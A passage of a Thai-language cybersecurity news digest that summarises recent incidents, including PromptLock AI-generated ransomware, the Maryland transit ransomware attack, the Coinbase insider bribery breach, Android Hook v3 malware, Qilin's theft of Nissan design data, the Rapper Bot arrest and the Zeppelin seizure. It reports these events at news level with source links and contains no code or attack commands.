น่ากลัวคือความสามารถในการเปลี่ยนพฤติกรรมทุกครั้งที่รัน แม้จะใช้ prompt เดิมก็ตาม เพราะ LLM เป็นระบบ non-deterministic ซึ่งทำให้เครื่องมือป้องกันไม่สามารถจับรูปแบบได้ง่าย นอกจากนี้ การรันโมเดล AI แบบ local ยังช่วยให้แฮกเกอร์ไม่ต้องเรียก API ไปยังเซิร์ฟเวอร์ของ OpenAI ซึ่งหมายความว่าไม่มีการบันทึกหรือแจ้งเตือนจากฝั่งผู้ให้บริการ AI ESET พบมัลแวร์นี้จากตัวอย่างที่ถูกอัปโหลดใน VirusTotal และเชื่อว่าเป็น proof-of-concept หรือโค้ดต้นแบบที่ยังไม่ถูกใช้โจมตีจริง แต่ก็เป็นสัญญาณเตือนว่า “ยุคของแรนซัมแวร์ที่มีสมอง” ได้เริ่มต้นขึ้นแล้ว 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ ESET ค้นพบมัลแวร์ PromptLock ซึ่งเป็นแรนซัมแวร์ตัวแรกที่ใช้ AI สร้างโค้ดแบบสด ➡️ ใช้โมเดล gpt-oss:20b จาก OpenAI ผ่าน Ollama API บนเครื่องเหยื่อโดยตรง ➡️ สร้าง Lua script เพื่อสแกนไฟล์ ขโมยข้อมูล เข้ารหัส และอาจทำลายข้อมูล ➡️ รองรับทุกระบบปฏิบัติการหลัก: Windows, macOS และ Linux ➡️ ใช้การเข้ารหัสแบบ SPECK 128-bit ซึ่งเบาและเร็ว ➡️ โค้ดมี prompt ฝังไว้ล่วงหน้าเพื่อสั่งให้ LLM สร้างสคริปต์ตามสถานการณ์ ➡️ มีการฝัง Bitcoin address สำหรับเรียกค่าไถ่ (ใช้ของ Satoshi Nakamoto เป็น placeholder) ➡️ พบตัวอย่างใน VirusTotal แต่ยังไม่มีหลักฐานว่าใช้โจมตีจริง ➡️ ESET เชื่อว่าเป็น proof-of-concept ที่แสดงศักยภาพของ AI ในการสร้างมัลแวร์ ➡️ OpenAI ระบุว่ากำลังพัฒนาระบบป้องกันและขอบคุณนักวิจัยที่แจ้งเตือน ✅ ข้อมูลเสริมจากภายนอก ➡️ Lua เป็นภาษาที่นิยมในเกมและปลั๊กอิน แต่มีประสิทธิภาพสูงและฝังง่ายในมัลแวร์ ➡️ Golang ถูกใช้เป็นโครงสร้างหลักของมัลแวร์ เพราะข้ามแพลตฟอร์มและคอมไพล์ง่าย ➡️ Ollama API เป็นช่องทางที่ช่วยให้โมเดล AI ทำงานแบบ local โดยไม่ต้องเรียกเซิร์ฟเวอร์ ➡️ Internal Proxy (MITRE ATT&CK T1090.001) เป็นเทคนิคที่ใช้เชื่อมต่อกับเซิร์ฟเวอร์ภายนอกอย่างลับ ➡️ AI ถูกใช้ในมัลแวร์มากขึ้น เช่น การสร้าง phishing message และ deepfake https://www.tomshardware.com/tech-industry/cyber-security/the-first-ai-powered-ransomware-has-been-discovered-promptlock-uses-local-ai-to-foil-heuristic-detection-and-evade-api-tracking

🚍 เรื่องเล่าจากรัฐแมรีแลนด์: เมื่อรถโดยสารสำหรับผู้พิการต้องหยุดชะงักเพราะแรนซัมแวร์ ในช่วงปลายเดือนสิงหาคม 2025 ระบบขนส่งสาธารณะของรัฐแมรีแลนด์ต้องเผชิญกับเหตุการณ์ไม่คาดฝัน เมื่อหน่วยงาน Maryland Transit Administration (MTA) ถูกโจมตีด้วยแรนซัมแวร์ ส่งผลให้บริการ Mobility ซึ่งเป็นบริการรถโดยสารสำหรับผู้พิการ ไม่สามารถรับคำขอเดินทางใหม่หรือเปลี่ยนแปลงการจองเดิมได้ แม้บริการหลักอื่น ๆ เช่น รถเมล์ รถไฟใต้ดิน และรถไฟ MARC ยังสามารถให้บริการได้ตามปกติ แต่ระบบดิจิทัลที่ใช้ในการจอง การติดตามเวลารถ และศูนย์บริการลูกค้ากลับได้รับผลกระทบอย่างหนัก ผู้โดยสารจำนวนมากต้องหันไปใช้ตารางเวลาแบบ PDF และเว็บไซต์ของ MTA แทนการดูเวลารถแบบเรียลไทม์ MTA ได้ประสานงานกับผู้เชี่ยวชาญด้านไซเบอร์และหน่วยงานบังคับใช้กฎหมายเพื่อสืบสวนต้นตอของการโจมตี พร้อมยืนยันว่าไม่มีข้อมูลบ่งชี้ว่าแฮกเกอร์เข้าถึงระบบควบคุมรถหรืออุปกรณ์ด้านความปลอดภัย ที่น่าสนใจคือ เหตุการณ์นี้ไม่ใช่ครั้งแรกที่บริการขนส่งสำหรับผู้พิการถูกโจมตีด้วยแรนซัมแวร์ ในช่วงสองปีที่ผ่านมา เมืองต่าง ๆ ในรัฐ Missouri และ Virginia ก็เคยเผชิญเหตุการณ์คล้ายกัน ทำให้ต้องจัดหาทางเลือกอื่นให้ผู้โดยสารที่มีความต้องการพิเศษ ในขณะเดียวกัน รัฐแมรีแลนด์ก็ได้เปิดศูนย์ฝึกอบรมด้านไซเบอร์แห่งใหม่ที่ใช้ AI จำลองสถานการณ์การโจมตีจริง เพื่อเตรียมความพร้อมให้บุคลากรด้านความปลอดภัยไซเบอร์ ซึ่งถือเป็นก้าวสำคัญในการเสริมความแข็งแกร่งให้กับระบบโครงสร้างพื้นฐานของรัฐ 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ MTA ถูกโจมตีด้วยแรนซัมแวร์ ส่งผลให้บริการ Mobility ไม่สามารถรับคำขอใหม่หรือเปลี่ยนแปลงการจองได้ ➡️ บริการหลักอื่น ๆ เช่น Local Bus, Metro Subway, Light Rail, MARC, Call-A-Ride และ Commuter Bus ยังให้บริการตามปกติ ➡️ ผู้โดยสารสามารถใช้บริการ Call-A-Ride แทนได้ผ่านเว็บไซต์หรือเบอร์โทรศัพท์ ➡️ ระบบติดตามเวลารถและศูนย์บริการลูกค้าถูกกระทบ ทำให้ข้อมูลเรียลไทม์ไม่สามารถใช้งานได้ ➡️ MTA ประสานงานกับผู้เชี่ยวชาญและหน่วยงานรัฐเพื่อสืบสวนและแก้ไขปัญหา ➡️ ไม่มีหลักฐานว่าแฮกเกอร์เข้าถึงระบบควบคุมรถหรืออุปกรณ์ความปลอดภัย ➡️ เหตุการณ์นี้คล้ายกับที่เคยเกิดใน Missouri และ Virginia ในช่วงสองปีที่ผ่านมา ➡️ รัฐแมรีแลนด์เปิดศูนย์ฝึกอบรมด้านไซเบอร์ที่ใช้ AI เพื่อเตรียมบุคลากรรับมือภัยคุกคาม ➡️ ศูนย์ฝึกอบรมนี้คาดว่าจะสร้างงานกว่า 200 ตำแหน่งในรัฐ ✅ ข้อมูลเสริมจากภายนอก ➡️ แรนซัมแวร์ที่โจมตีระบบขนส่งมักใช้ช่องโหว่ในระบบจองหรือฐานข้อมูลผู้ใช้ ➡️ การโจมตีระบบ Mobility ส่งผลกระทบต่อผู้พิการที่ต้องพึ่งพาการเดินทางเพื่อการรักษาและชีวิตประจำวัน ➡️ การใช้ AI ในการฝึกอบรมด้านไซเบอร์เป็นแนวโน้มใหม่ที่หลายรัฐเริ่มนำมาใช้ ➡️ การไม่มีระบบสำรองสำหรับข้อมูลเรียลไทม์ทำให้ผู้โดยสารต้องเผชิญกับความไม่แน่นอนในการเดินทาง ➡️ การโจมตีโครงสร้างพื้นฐานด้านขนส่งมักมีเป้าหมายเพื่อสร้างแรงกดดันให้หน่วยงานยอมจ่ายค่าไถ่ https://www.tomshardware.com/tech-industry/cyber-security/ransomware-attack-disrupts-marylands-public-transit-service-for-disabled-travelers-mta-says-it-is-investigating-cybersecurity-incident-but-core-services-operating-normally

💸 เรื่องเล่าจากเบื้องหลัง Coinbase: เมื่อภัยไซเบอร์มาในรูปแบบ “สินบน” ในเดือนพฤษภาคม 2025 บริษัทคริปโตยักษ์ใหญ่ Coinbase ได้รับอีเมลจากแฮกเกอร์นิรนาม แจ้งว่าพวกเขาได้ข้อมูลลูกค้าจำนวนหนึ่ง พร้อมเอกสารภายในของบริษัท โดยขู่เรียกค่าไถ่ถึง 20 ล้านดอลลาร์เพื่อไม่ให้เผยแพร่ข้อมูล แต่สิ่งที่น่าตกใจไม่ใช่แค่การขโมยข้อมูล — แต่เป็น “วิธีการ” ที่แฮกเกอร์ใช้: พวกเขาเสนอสินบนให้พนักงาน outsource ที่ศูนย์บริการลูกค้าในอินเดีย (TaskUs) เพื่อให้เข้าถึงระบบภายใน โดยมีการจ่ายเงินสูงถึง 2,500 ดอลลาร์ต่อคนเพื่อให้คัดลอกข้อมูลจากระบบสนับสนุนลูกค้า ข้อมูลที่ถูกขโมยมีทั้งชื่อ เบอร์โทร อีเมล หมายเลขประกันสังคม และข้อมูลบัญชีธนาคารแบบ masked รวมถึงข้อมูลการใช้งานของลูกค้ากว่า 70,000 ราย — คิดเป็น 1% ของผู้ใช้งานรายเดือนของ Coinbase Coinbase ปฏิเสธที่จะจ่ายค่าไถ่ และสวนกลับด้วยการตั้งค่าหัวแฮกเกอร์ 20 ล้านดอลลาร์ พร้อมให้คำมั่นว่าจะชดเชยลูกค้าที่ตกเป็นเหยื่อของการหลอกลวงผ่าน social engineering และปรับปรุงระบบรักษาความปลอดภัยให้เข้มแข็งขึ้น นอกจากนี้ Coinbase ยังไล่พนักงานที่รับสินบนออกทันที และแจ้งหน่วยงานบังคับใช้กฎหมายทั้งในสหรัฐฯ และต่างประเทศให้ดำเนินคดี ส่วน TaskUs ก็หยุดให้บริการ Coinbase ที่ศูนย์ในอินเดีย และปลดพนักงานกว่า 226 คน สิ่งที่ผู้เชี่ยวชาญชี้คือ “การติดสินบน” กำลังกลายเป็นช่องทางใหม่ของแฮกเกอร์ในการเจาะระบบองค์กร โดยเฉพาะเมื่อการโจมตีแบบเดิม เช่น phishing เริ่มถูกป้องกันได้ดีขึ้น 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ Coinbase ถูกแฮกเกอร์ขู่เรียกค่าไถ่ 20 ล้านดอลลาร์จากข้อมูลลูกค้าและเอกสารภายใน ➡️ แฮกเกอร์ใช้วิธีติดสินบนพนักงาน outsource ที่บริษัท TaskUs ในอินเดีย ➡️ มีการเสนอเงินสูงถึง $2,500 ต่อคนเพื่อให้คัดลอกข้อมูลจากระบบสนับสนุนลูกค้า ➡️ ข้อมูลที่ถูกขโมยรวมถึงชื่อ เบอร์โทร อีเมล หมายเลขประกันสังคม และข้อมูลบัญชี ➡️ Coinbase ปฏิเสธการจ่ายค่าไถ่ และตั้งค่าหัวแฮกเกอร์เป็นเงินเท่ากัน ➡️ บริษัทให้คำมั่นว่าจะชดเชยลูกค้าที่ตกเป็นเหยื่อ social engineering ➡️ พนักงานที่รับสินบนถูกไล่ออกทันที และถูกแจ้งความดำเนินคดี ➡️ TaskUs หยุดให้บริการ Coinbase ที่ศูนย์ในอินเดีย และปลดพนักงาน 226 คน ➡️ Coinbase ประเมินค่าเสียหายและค่าชดเชยอยู่ระหว่าง $180M ถึง $400M ➡️ ผู้เชี่ยวชาญแนะนำให้ฝึกอบรมพนักงานเรื่องการรับมือกับการติดสินบน ✅ ข้อมูลเสริมจากภายนอก ➡️ กลุ่มแฮกเกอร์ “The Com” อ้างว่าอยู่เบื้องหลังการโจมตี แต่ยังไม่มีการยืนยัน ➡️ การติดสินบนพนักงานเพื่อเข้าถึงข้อมูลภายในเคยเกิดขึ้นกับ Tesla ในปี 2020 ➡️ การใช้สินบนเป็นช่องทางโจมตีองค์กรกำลังเพิ่มขึ้นในหลายอุตสาหกรรม ➡️ การฝึกอบรมพนักงานให้รู้เท่าทันการติดสินบนควรเป็นส่วนหนึ่งของแผนความปลอดภัย ➡️ การตั้งศูนย์บริการใหม่ในสหรัฐฯ เป็นหนึ่งในมาตรการป้องกันของ Coinbase https://www.csoonline.com/article/4042522/behind-the-coinbase-breach-bribery-is-an-emerging-enterprise-threat.html

📱 เรื่องเล่าจากโลกไซเบอร์: เมื่อมือถือ Android กลายเป็นเหยื่อเรียกค่าไถ่ ลองจินตนาการว่าคุณกำลังใช้มือถือ Android อยู่ดี ๆ แล้วจู่ ๆ หน้าจอก็ขึ้นข้อความ “WARNING” เต็มจอ พร้อมบอกให้คุณจ่ายเงินค่าไถ่ผ่านกระเป๋าคริปโตเพื่อปลดล็อกเครื่อง…นี่ไม่ใช่ฉากจากหนังไซไฟ แต่มันคือภัยคุกคามจริงจากมัลแวร์ตัวใหม่ชื่อว่า “Hook Version 3” มัลแวร์ Hook เคยเป็นแค่ banking trojan ที่ขโมยข้อมูลบัญชีธนาคาร แต่ตอนนี้มันกลายร่างเป็น “มัลแวร์ลูกผสม” ที่รวมความสามารถของ ransomware, spyware และการควบคุมเครื่องจากระยะไกลไว้ในตัวเดียว Hook v3 รองรับคำสั่งจากแฮกเกอร์ถึง 107 แบบ โดยมีคำสั่งใหม่เพิ่มถึง 38 คำสั่ง เช่น การแสดงหน้าจอปลอมเพื่อหลอกให้ผู้ใช้กรอกรหัส PIN, การปลอมหน้าจอ Google Pay เพื่อขโมยข้อมูลบัตรเครดิต หรือแม้แต่การสตรีมหน้าจอมือถือแบบเรียลไทม์ให้แฮกเกอร์ดู ที่น่ากลัวคือ Hook ใช้เทคนิคหลอกให้ผู้ใช้เปิด “Accessibility Services” ซึ่งเป็นฟีเจอร์ช่วยเหลือผู้พิการใน Android เพื่อให้มันสามารถควบคุมเครื่องได้โดยอัตโนมัติ มัลแวร์นี้ยังถูกเผยแพร่ผ่าน GitHub และเว็บไซต์ฟิชชิ่ง ทำให้การกระจายตัวรวดเร็วและกว้างขวางมากขึ้น โดยมีมัลแวร์ตระกูลอื่นอย่าง Ermac และ Brokewell ใช้ช่องทางเดียวกัน Hook ยังมีฟีเจอร์ที่กำลังพัฒนา เช่น การใช้ RabbitMQ และ Telegram เพื่อสื่อสารกับเซิร์ฟเวอร์ควบคุม ซึ่งแสดงให้เห็นว่าแฮกเกอร์ยังไม่หยุดพัฒนาเลย 🔍 สรุปเนื้อหาเป็นหัวข้อ ➡️ Hook Version 3 เป็นมัลแวร์ Android ที่รวม ransomware, spyware และ banking trojan ในตัวเดียว ➡️ รองรับคำสั่งจากแฮกเกอร์ถึง 107 แบบ โดยมีคำสั่งใหม่เพิ่ม 38 คำสั่ง ➡️ ใช้หน้าจอปลอม เช่น Google Pay, NFC, PIN unlock เพื่อหลอกขโมยข้อมูล ➡️ สามารถสตรีมหน้าจอมือถือแบบเรียลไทม์ให้แฮกเกอร์ดู ➡️ ใช้ Accessibility Services เพื่อควบคุมเครื่องโดยอัตโนมัติ ➡️ แสดงหน้าจอเรียกค่าไถ่แบบเต็มจอ พร้อมกระเป๋าคริปโตและจำนวนเงินที่รับจากเซิร์ฟเวอร์ ➡️ ถูกเผยแพร่ผ่าน GitHub และเว็บไซต์ฟิชชิ่ง ➡️ มีการพัฒนาให้ใช้ RabbitMQ และ Telegram ในอนาคต ➡️ เป็นภัยคุกคามต่อทั้งผู้ใช้ทั่วไปและองค์กรธุรกิจ ✅ ข้อมูลเสริมจากภายนอก ➡️ Hook เป็นสายพันธุ์ที่พัฒนาต่อจาก ERMAC ซึ่งเคยมีซอร์สโค้ดหลุดออกมา ➡️ ฟีเจอร์สตรีมหน้าจอแบบเรียลไทม์ยังถือว่าเป็นสิ่งที่พบได้น้อยในมัลแวร์ Android ➡️ การใช้ GitHub เป็นช่องทางเผยแพร่มัลแวร์กำลังเป็นเทรนด์ในกลุ่มแฮกเกอร์ ➡️ การใช้ overlay แบบโปร่งใสเพื่อจับ gesture ของผู้ใช้เป็นเทคนิคใหม่ที่ซับซ้อน ➡️ การใช้ HTML ฝังใน APK เพื่อแสดง ransomware overlay เป็นการผสานเทคนิคเว็บกับแอป https://hackread.com/android-hook-malware-variant-locks-devices-ransomware/

🎙️ เมื่อดีไซน์ลับของ Nissan ถูกขโมย – และภัยไซเบอร์ก็ไม่ใช่เรื่องไกลตัวอีกต่อไป เมื่อวันที่ 21 สิงหาคม 2025 กลุ่มแฮกเกอร์ Qilin ได้ออกมาอ้างว่า พวกเขาได้เจาะระบบของ Nissan Creative Box Inc. (CBI) ซึ่งเป็นสตูดิโอออกแบบในโตเกียวที่อยู่ภายใต้บริษัท Nissan Motor Co. และขโมยข้อมูลไปกว่า 4 เทราไบต์ รวมกว่า 405,882 ไฟล์ ข้อมูลที่ถูกขโมยนั้นไม่ใช่แค่เอกสารทั่วไป แต่รวมถึงไฟล์ออกแบบ 3D, ภาพเรนเดอร์ภายในรถ, สเปรดชีตการเงิน, และภาพการใช้งาน VR ในการออกแบบรถยนต์ ซึ่งเป็นข้อมูลลับที่ใช้ในการพัฒนารถต้นแบบและการวางแผนผลิตภัณฑ์ในอนาคต Qilin ขู่ว่าหาก Nissan ไม่ตอบสนองหรือเพิกเฉย พวกเขาจะปล่อยข้อมูลทั้งหมดให้สาธารณะ รวมถึงคู่แข่ง ซึ่งอาจส่งผลกระทบต่อความได้เปรียบทางธุรกิจและชื่อเสียงของ Nissan ในระยะยาว นี่ไม่ใช่ครั้งแรกที่ Qilin โจมตีองค์กรใหญ่ ก่อนหน้านี้พวกเขาเคยโจมตี Synnovis ผู้ให้บริการด้านสุขภาพในอังกฤษ จนทำให้มีผู้เสียชีวิตจากการเลื่อนการรักษา และล่าสุดยังโจมตีบริษัทอุตสาหกรรมในเยอรมนีอีกด้วย เหตุการณ์นี้สะท้อนถึงแนวโน้มใหม่ของการโจมตีแบบเจาะจงเป้าหมาย โดยมุ่งเน้นองค์กรที่มีข้อมูลสำคัญและมีผลกระทบต่อห่วงโซ่อุปทานระดับโลก 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ กลุ่ม Qilin ransomware อ้างว่าได้ขโมยข้อมูล 4TB จาก Nissan CBI ➡️ ข้อมูลรวมกว่า 405,882 ไฟล์ เช่น ไฟล์ออกแบบ 3D, ภาพเรนเดอร์, สเปรดชีตการเงิน และภาพ VR ➡️ ข้อมูลที่ถูกขโมยเป็นทรัพย์สินทางปัญญาเกี่ยวกับการออกแบบรถยนต์ ➡️ Qilin ขู่ว่าจะปล่อยข้อมูลทั้งหมดหาก Nissan ไม่ตอบสนอง ➡️ Nissan CBI เป็นสตูดิโอออกแบบที่ตั้งอยู่ในย่าน Harajuku โตเกียว ➡️ Creative Box เป็นแหล่งพัฒนาแนวคิดรถยนต์ใหม่ เช่น Nissan Nuvu ➡️ Qilin เคยโจมตี Synnovis ในอังกฤษ ส่งผลกระทบต่อการรักษาพยาบาล ➡️ กลุ่มนี้ใช้โมเดล ransomware-as-a-service และมีเป้าหมายระดับองค์กร ➡️ การโจมตีครั้งนี้อาจส่งผลต่อชื่อเสียงและความสามารถในการแข่งขันของ Nissan ➡️ ยังไม่มีคำแถลงอย่างเป็นทางการจาก Nissan ณ เวลาที่รายงาน ✅ ข้อมูลเสริมจากภายนอก ➡️ Qilin ยังโจมตีบริษัท Spohn + Burkhardt ในเยอรมนีในวันเดียวกัน ➡️ นักวิจัยจาก Cybernews ระบุว่า Qilin เลือกเป้าหมายที่มีข้อมูลสำคัญและมีผลกระทบสูง ➡️ การโจมตีแบบนี้มักใช้การเผยแพร่ข้อมูลบางส่วนเพื่อกดดันให้เหยื่อจ่ายค่าไถ่ ➡️ Creative Box เป็นหนึ่งในบริษัทในเครือที่สำคัญของ Nissan ในญี่ปุ่น ➡️ การออกแบบรถยนต์เป็นข้อมูลที่มีมูลค่าสูงและมักถูกปกป้องอย่างเข้มงวด https://hackread.com/qilin-ransomware-gang-4tb-data-breach-nissan-cbi/

🎙️ Rapper Bot – จากเครือข่ายโจมตีระดับโลก สู่การล่มสลายด้วยหมายจับเดียว ในเดือนสิงหาคม 2025 Ethan Foltz ชายวัย 22 ปีจากรัฐโอเรกอน ถูกจับกุมโดยเจ้าหน้าที่ของกระทรวงยุติธรรมสหรัฐฯ (DoJ) หลังถูกกล่าวหาว่าเป็นผู้สร้างและบริหาร “Rapper Bot” เครือข่าย DDoS-for-hire ที่ถูกใช้ในการโจมตีมากกว่า 370,000 ครั้งทั่วโลก Rapper Bot เป็นมัลแวร์ที่แพร่กระจายผ่านอุปกรณ์ทั่วไป เช่น DVR และ WiFi router โดยแฮกเกอร์สามารถควบคุมอุปกรณ์เหล่านี้ได้มากถึง 95,000 เครื่อง และใช้เป็นฐานยิงข้อมูลมหาศาลเพื่อโจมตีเป้าหมายแบบ DDoS (Distributed Denial of Service) เป้าหมายของการโจมตีมีตั้งแต่หน่วยงานรัฐบาล สื่อสังคมออนไลน์ ไปจนถึงบริษัทเทคโนโลยีในสหรัฐฯ โดยบางครั้งการโจมตีมีขนาดสูงถึง 6 Tbps ซึ่งสามารถทำให้ระบบล่มได้ภายในไม่กี่วินาที Foltzถูกกล่าวหาว่าให้บริการเช่าเครือข่ายนี้แก่ลูกค้าทั่วโลกในรูปแบบ “DDoS-for-hire” และบางรายยังใช้เพื่อข่มขู่เรียกค่าไถ่จากเหยื่อด้วย การจับกุมครั้งนี้เป็นส่วนหนึ่งของปฏิบัติการ PowerOFF ซึ่งเป็นความร่วมมือระหว่างหน่วยงานระหว่างประเทศในการปราบปรามบริการ DDoS-for-hire โดยก่อนหน้านี้ในปี 2024 มีการยึดโดเมนที่เกี่ยวข้องถึง 27 แห่ง 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ Ethan Foltz อายุ 22 ปี ถูกจับในรัฐโอเรกอน ฐานสร้างและบริหาร Rapper Bot ➡️ Rapper Bot เป็นเครือข่าย DDoS-for-hire ที่ควบคุมอุปกรณ์ได้ถึง 95,000 เครื่อง ➡️ ใช้มัลแวร์เจาะ DVR และ WiFi router เพื่อสร้าง botnet ➡️ มีการโจมตีมากกว่า 370,000 ครั้งต่อ 18,000 เหยื่อใน 80 ประเทศ ➡️ ขนาดการโจมตีสูงสุดถึง 6 Tbps ซึ่งถือว่าใหญ่ที่สุดในประวัติศาสตร์ DDoS ➡️ เป้าหมายรวมถึงหน่วยงานรัฐบาล สื่อสังคม และบริษัทเทคโนโลยีสหรัฐฯ ➡️ ลูกค้าบางรายใช้ Rapper Bot เพื่อข่มขู่เรียกค่าไถ่จากเหยื่อ ➡️ การจับกุมเป็นส่วนหนึ่งของปฏิบัติการ PowerOFF ที่ปราบปรามบริการ DDoS-for-hire ➡️ หลังการจับกุม ไม่มีรายงานการโจมตีจาก Rapper Bot เพิ่มเติม ➡️ Foltz ถูกตั้งข้อหาสนับสนุนการบุกรุกระบบคอมพิวเตอร์ และอาจถูกจำคุกสูงสุด 10 ปี ✅ ข้อมูลเสริมจากภายนอก ➡️ DDoS ขนาด 2–3 Tbps สามารถทำให้เว็บไซต์หรือบริการล่มได้ภายในไม่กี่วินาที ➡️ ค่าเสียหายจากการโจมตี 30 วินาทีอาจสูงถึง $10,000 ต่อครั้ง ➡️ Botnet ที่ใช้ IoT device เป็นเป้าหมายหลัก เพราะมีความปลอดภัยต่ำ ➡️ Rapper Bot เคยถูกเรียกอีกชื่อว่า “Eleven Eleven Botnet” และ “CowBot” ➡️ การจับกุมครั้งนี้ได้รับการสนับสนุนจากหน่วยงานความมั่นคงของกระทรวงกลาโหมสหรัฐฯ https://www.techradar.com/pro/security/hacker-behind-rapper-bot-ddos-for-hire-botnet-which-carried-out-over-370-000-attacks-arrested

🕵️‍♂️ ปฏิบัติการยึดคริปโตจากกลุ่ม Zeppelin: เมื่อความยุติธรรมไล่ทันอาชญากรรมไซเบอร์ กระทรวงยุติธรรมสหรัฐฯ ประกาศยึดเงินคริปโตมูลค่ากว่า $2.8 ล้าน พร้อมเงินสด $70,000 และรถยนต์หรูจาก Ianis Aleksandrovich Antropenko ผู้ต้องสงสัยว่าเป็นหัวหน้ากลุ่มแรนซัมแวร์ Zeppelin ซึ่งเคยโจมตีองค์กรในหลายประเทศตั้งแต่ปี 2019–2022 Zeppelin เป็นแรนซัมแวร์แบบ RaaS (Ransomware-as-a-Service) ที่ใช้วิธี “double extortion” คือเข้ารหัสข้อมูลเหยื่อและขโมยข้อมูลไปด้วย จากนั้นขู่จะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่ โดยกลุ่มนี้เคยโจมตีองค์กรด้านสุขภาพ, เทคโนโลยี, การเงิน และแม้แต่ศูนย์พักพิงคนไร้บ้าน Antropenko และพวกใช้บริการ ChipMixer ซึ่งเป็นแพลตฟอร์ม “ล้างรอย” เงินคริปโต เพื่อซ่อนที่มาของเงินค่าไถ่ และยังใช้วิธีแลกคริปโตเป็นเงินสดแล้วฝากแบบแบ่งยอดเพื่อหลบเลี่ยงการตรวจสอบจากธนาคาร แม้ Zeppelin จะถูกระบุว่า “ล้มหาย” ไปในปี 2022 หลังนักวิจัยจาก Unit221b สร้างเครื่องมือถอดรหัสฟรีให้เหยื่อ แต่ในปี 2024 มีรายงานว่าโค้ดของ Zeppelin ถูกขายในฟอรั่มแฮกเกอร์รัสเซียในราคาเพียง $500 ซึ่งอาจนำไปสู่การฟื้นคืนชีพของมัลแวร์นี้ในอนาคต ✅ ข้อมูลจากข่าวหลัก ➡️ DoJ ยึดคริปโตมูลค่า $2.8 ล้าน, เงินสด $70,000 และรถหรูจากผู้ต้องสงสัย Antropenko ➡️ Antropenko ถูกตั้งข้อหาฉ้อโกงคอมพิวเตอร์และฟอกเงินในศาลรัฐเท็กซัส ➡️ Zeppelin เป็นแรนซัมแวร์แบบ RaaS ที่ใช้วิธี double extortion ➡️ เหยื่อถูกเข้ารหัสข้อมูลและขู่เปิดเผยข้อมูลหากไม่จ่ายค่าไถ่ ➡️ กลุ่มนี้เคยโจมตีองค์กรในสหรัฐฯ และต่างประเทศ รวมถึง NGO และศูนย์พักพิง ➡️ ใช้ ChipMixer และการฝากเงินแบบแบ่งยอดเพื่อฟอกเงิน ➡️ DoJ ออกหมายจับ 6 ฉบับในรัฐเท็กซัส, เวอร์จิเนีย และแคลิฟอร์เนีย ➡️ Zeppelin ถูกระบุว่าเลิกใช้งานในปี 2022 หลังนักวิจัยสร้างเครื่องมือถอดรหัสฟรี ➡️ การยึดทรัพย์ครั้งนี้เป็นส่วนหนึ่งของแคมเปญปราบปรามแรนซัมแวร์ของ DoJ ✅ ข้อมูลเสริมจากภายนอก ➡️ Zeppelin พัฒนาจาก VegaLocker และ Buran ซึ่งเป็นมัลแวร์สาย Delphi ➡️ FBI เคยเตือนว่า Zeppelin ใช้ช่องโหว่ RDP และ SonicWall ในการเข้าถึงระบบ ➡️ Unit221b หยุดให้บริการถอดรหัส Zeppelin แล้วในปี 2024 ➡️ มีรายงานว่า Zeppelin2 ถูกขายในฟอรั่มแฮกเกอร์รัสเซียในราคา $500 ➡️ DoJ เคยยึดคริปโตจากกลุ่ม Chaos และ BlackSuit รวมกว่า $3.4 ล้าน ➡️ ตั้งแต่ปี 2020 DoJ ยึดทรัพย์จากอาชญากรรมไซเบอร์รวมกว่า $350 ล้าน https://www.techradar.com/pro/security/millions-of-dollars-in-cryptocurrency-has-been-confiscated-as-the-doj-cracks-down-on-an-infamous-ransomware-operator

🧯 เมื่อ CISO กลายเป็นแพะรับบาปหลังเหตุการณ์ ransomware ลองจินตนาการว่าคุณเป็น CISO ที่ทำงานอย่างหนักเพื่อป้องกันภัยไซเบอร์ แต่วันหนึ่งบริษัทของคุณโดนโจมตีด้วย ransomware และแม้คุณจะทำตามแผนรับมือทุกขั้นตอน คุณก็ยังถูกปลดออกจากตำแหน่ง นี่คือสิ่งที่เกิดขึ้นจริงในองค์กรจำนวนมาก จากรายงานของ Sophos พบว่า 25% ของ CISO ถูกเปลี่ยนตัวหลังเกิดเหตุการณ์ ransomware โดยไม่จำเป็นต้องเป็นความผิดของพวกเขาโดยตรง ผู้เชี่ยวชาญชี้ว่า การปลด CISO มักเกิดจากแรงกดดันของบอร์ดบริหารที่ต้องการ “รีเซ็ตภาพลักษณ์” มากกว่าการวิเคราะห์เชิงกลยุทธ์ บางครั้ง CISO ถูกปลดแม้ระบบตรวจจับทำงานดี แผนรับมือถูกดำเนินการครบ และการกู้คืนข้อมูลอยู่ใน SLA ยิ่งไปกว่านั้น บางองค์กรยังไม่ให้ CISO เข้าร่วมประชุมสำคัญ เพราะกลัวว่าจะ “ขัดขวางธุรกิจ” ซึ่งทำให้การตัดสินใจด้านความปลอดภัยถูกละเลย และนำไปสู่ช่องโหว่ที่ถูกโจมตีในภายหลัง ✅ ข้อมูลจากรายงานข่าวและการวิเคราะห์ ➡️ 25% ของ CISO ถูกเปลี่ยนตัวหลังเกิดเหตุการณ์ ransomware ➡️ การปลด CISO มักเกิดจากแรงกดดันของบอร์ด ไม่ใช่ความผิดโดยตรง ➡️ หากแผนรับมือทำงานดี การปลดอาจส่งสัญญาณผิดภายในองค์กร ➡️ ช่องโหว่ที่ถูกโจมตีมักเป็นช่องที่ “รู้ว่ามี” แต่ไม่ได้รับการแก้ไข ➡️ 40% ของผู้ตอบแบบสอบถามยอมรับว่าโจมตีมาจากช่องโหว่ที่รู้แต่ไม่ได้จัดการ ➡️ สาเหตุหลักของ ransomware คือช่องโหว่ (32%) และ credential ที่ถูกขโมย (23%) ➡️ อีเมลและ phishing ยังเป็นช่องทางโจมตีหลัก (รวมกัน 37%) ➡️ บาง CISO ลาออกเองเพราะความเครียดและความขัดแย้งหลังเหตุการณ์ ➡️ การเปรียบเทียบ CISO กับ “นักดับเพลิง” ชี้ว่าพวกเขาคือผู้รับมือ ไม่ใช่ต้นเหตุ ➡️ การไม่ให้ CISO เข้าร่วมประชุมสำคัญทำให้ความปลอดภัยถูกละเลย ✅ ข้อมูลเสริมจากภายนอก ➡️ รายงาน Sophos ปี 2025 สำรวจจาก 3,400 ผู้บริหาร IT ใน 17 ประเทศ ➡️ 41% ของทีมที่ถูกโจมตีมีความเครียดสูง และ 31% มีการลาหยุดจากปัญหาสุขภาพจิต ➡️ ค่าใช้จ่ายในการกู้คืนข้อมูลเฉลี่ยอยู่ที่ $1.53M 